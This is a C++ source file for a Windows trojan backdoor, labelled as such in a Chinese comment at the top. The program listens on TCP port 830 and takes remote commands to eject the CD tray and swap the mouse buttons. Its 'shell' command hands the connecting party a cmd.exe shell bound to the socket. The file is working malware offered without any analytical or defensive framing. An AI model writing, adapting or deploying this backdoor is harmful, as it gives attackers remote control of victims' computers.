door1.cpp

木马后门,它就是个木马后门,木马 木马

#include<winsock2.h>
#include<windows.h>
#include<stdio.h>
#include<mmsystem.h>
#pragma comment(lib,"Winmm.lib")
#pragma comment(lib,"Ws2_32")
int main()
{
	unsigned long IBytesRead=0;
	char Buff[1024],cmd[1024];
	char g_helpmess[] = "?	--help\r\nopen	--open optical disk\r\nclose	--close optical disk\r\n"
					"exchange	--exchange mouse button\r\nrestore	--restore mouse button\r\n"
					"shell	--get cmd shell\r\nquit	--quit,can connect again\r\nexit	--backdoor";


	WSADATA ws;
	SOCKET listenFD;
	int i,ret;
    
	WSAStartup(MAKEWORD(2,2),&ws);
	listenFD=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);

	struct sockaddr_in server;
	server.sin_family=AF_INET;
	server.sin_port=htons(830);
	server.sin_addr.s_addr=ADDR_ANY;
	ret=bind(listenFD,(sockaddr *)&server,sizeof(server));
	ret=listen(listenFD,2);

	int iAddrSize=sizeof(server);	
ag:
	SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
	for(i=0;i<1024;i++)
	{
		IBytesRead=0;
		if(strlen(cmd))
		send(clientFD,"\r\ndoor>",sizeof("door>"),0);
    	while(IBytesRead<256)
	{
		if(recv(clientFD,Buff,1,0)==SOCKET_ERROR)
		{
			closesocket(clientFD);
			goto ag;
		}
		cmd[IBytesRead]=Buff[0];
		if((Buff[0]==0xa)||(Buff[0]==0xd))
		{
           cmd[IBytesRead]=0;
		   break;
		}
        IBytesRead++;
	}
	if(strcmp(cmd,"open")==0)
		{
			mciSendString("set cdaudio door open",NULL,0,NULL);
		}
	if(strcmp(cmd,"close")==0)
		{
			mciSendString("Set cdaudio door closed wait",NULL,0,NULL);
		}
	if(strcmp(cmd,"exchange")==0)
		{
			SwapMouseButton(1);
		}
	if(strcmp(cmd,"restore")==0)
		{
			SwapMouseButton(0);
		}
    if(strcmp(cmd,"quit")==0)
		{
			closesocket(clientFD);
			goto ag;
		}
    if(strcmp(cmd,"exit")==0)
		{
			closesocket(clientFD);
			closesocket(listenFD);
			goto end;
		}
    if(strcmp(cmd,"shell")==0)
		{
			 STARTUPINFO si;
             ZeroMemory(&si,sizeof(si));
	         si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
	         si.wShowWindow=SW_HIDE;
	         si.wShowWindow=SW_SHOWNORMAL;
	         si.hStdInput=si.hStdOutput=si.hStdError=(void *)clientFD;
	         char cmdLine[]="cmd";
	         PROCESS_INFORMATION ProcessInformation;
	         ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
	         WaitForSingleObject(ProcessInformation.hProcess,INFINITE);
	         TerminateProcess(ProcessInformation.hProcess,0);
	         CloseHandle(ProcessInformation.hProcess);
		     send(clientFD,"Shell Ok",sizeof("Shell Ok"),0);
	   	}  
		if(strcmp(cmd,"?")==0)
		{
			send(clientFD,g_helpmess,sizeof(g_helpmess),0);
		} 
	}
end: ;
	return 0;
}